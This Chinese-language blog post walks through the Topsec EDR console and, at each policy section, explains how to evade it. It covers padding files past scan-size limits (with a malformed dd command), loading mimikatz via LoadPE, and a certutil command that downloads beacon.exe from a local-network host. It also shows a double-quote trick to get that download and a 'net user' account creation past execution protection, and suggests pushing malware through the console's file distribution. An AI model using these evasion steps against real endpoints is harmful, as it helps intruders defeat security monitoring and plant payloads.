某融信听说是和火绒有合作的,至于如何去安装,这里我是花了500块钱去咸鱼买了1年的授权码,大家有兴趣也可以去购买。
某融信目前EDR的版本是1.0.13.1版本。
某融信(Topsec)EDR 是由某融信科技集团开发的终端检测与响应(EDR)解决方案,专注于帮助企业和组织提升终端设备的安全性。它主要提供以下功能:
威胁检测与防护:实时监控终端上的行为,检测恶意软件、网络攻击和其他潜在的安全威胁,并提供自动化的防护措施。
事件响应:支持自动化和手动事件响应功能,帮助安全团队迅速处理和隔离威胁。
行为分析:通过对终端设备的行为进行分析,识别异常活动,预防潜在攻击。
安全运营可视化:提供可视化的安全运营界面,帮助安全团队更好地理解和管理网络安全态势。
威胁情报集成:结合外部威胁情报,提升对新型威胁的检测和响应能力。
合规管理:帮助企业符合各类安全合规要求,确保终端安全措施到位。
某融信EDR广泛应用于政府机构、金融机构、企业等领域,助力企业防范日益复杂的网络安全威胁。
安装的话也非常简单,去咸鱼买一个授权即可,需要注意的是虚拟机的配置需要7-8GB的内存以及100GB的硬盘即可。
EDR需要一个客户端和一个服务端。
就比如说客户端查杀某个病毒会将日志上传到服务端。
某融信页面
我们来简单了解一下某融信EDR的页面。
首先是终端管理,终端管理其实就是你将某融信EDR安装到某台Windwos PC上,这里就会显示。
同样在客户端这里也会显示已连接到管理中心。
我们可以点击客户端的名称。
这里会显示客户端相关的一些信息。
例如在基本信息中计算机名,IP地址,操作系统,病毒库时间,实现时间以及安装时间等等。
在安全策略这里可以对其这一台客户端机器来设置安全策略。
这个当下我们会在安装策略这里说。
紧接着就是终端的任务,这里可以添加一些任务来对其进行下发,比如快速查杀等等。
可以看到这里当下发快速扫描的时候在客户端这里就会快速扫描。
在下发类型这里会包含很多下发的类型,比如关机,快速扫描,自定义扫描,重新连接等等。
另外我们也可以分发文件,比如分发我们的恶意程序。
在分发管理这里我们可以上传文件。
在任务管理这里->添加->任务类型选择文件分发。
最后选择任务点击下发任务即可。
紧接着就是安装部署这里,这里就是下载客户端的地方了,一个是离线,一个是在线。
安全策略
紧接着我们来看一下安全策略这一栏,我们只需要去关注终端策略这里。
点击查看和修改。
病毒查杀模块
针对于病毒查杀模块,这里默认是深度查杀压缩包中的病毒木马,他会自动跳过大于20MB的压缩包,那么也就是说我们去投放压缩包的时候可以一个压缩包中去套很多个压缩包。
需要注意的是这个只针对于快速秒,如果是自定义扫描肯定是不行的。
我们可以看到在发现病毒的时候默认是不会自动处理的。
这里引擎设置,关于启发式以及沙箱这些我们之前都介绍过了,我们来看最后一个查杀文件如果大于50MB会自动跳过。
这里其实也是一样的,如果是自定义扫描的话,是不限制文件大小的。这里提一嘴我们可以通过文件膨胀来使文件体积增大。
关于文章膨胀这里, 给大家来简单介绍一下,文件膨胀其实就是在恶意文件中填充垃圾数据。一般会在文件末尾附加大量空字节。
因为很多这个安全解决方案对其能够扫描的文件大小都有限制的。
文件膨胀最简单的方式,如下:
我们可以尝试将30MB的空字节数据追加到某个ZIP文件中。
dd if=/dev/zero bs=1M count=60 beacon.exe针对于文件膨胀对抗EDR还是很有效的,需要注意的是每一个EDR都是不一样的。
文件实时监控
紧接着我们来看看文件实时监控。
首先是扫描的时机,其实就是说你执行的时候才会进行扫描,这是默认设置的,那么针对于这个我们如何去绕过呢?
我们可以通过LoadPe的方式来去加载我们的程序,比如我们想去加载mimikatz。
直接运行肯定是会被杀得。
那么如果我们通过LoadPE的这种方式去加载的话是没有任何问题的。
如果我们将其设置为在文件发生所有类型操作时进行扫描。
那么我们恶意软件只要复制到目标机器上就会被干掉。
如上其实就是文件的实时监控了。
那么我们可以去尝试看看DLL杀不杀,因为有些EDR他对DLL很放开的。
但是我们发现还是会杀得。
需要注意的是在发现病毒这里默认它只是提示的。我这里设置了自动处理。
恶意行为监控
恶意行为就比如说你申请了一块内存,往这块内存中copy了shellcode,他会自动处理。
系统防御
主要我们来看一下系统加固这里。
如上默认的处理方式都是询问的。
首先我们来看一下执行防护这里。我们尝试使用certutil去下载文件。
certutil -urlcache -split -f http://192.168.110.192:8000/beacon.exe可以看到这里会进行拦截的。
绕过非常简单。加一个双引号就可以了
certutil "-urlcache" -split -f http://192.168.110.192:8000/beacon.exe包括命令行去修改密码也是可以通过这种方式绕过的。
例如如下:
net user "relaysec" relaysec /add其他感觉也没什么好说的。
某融信的EDR相对来说是非常好过的,只需要使用过火绒的代码即可。
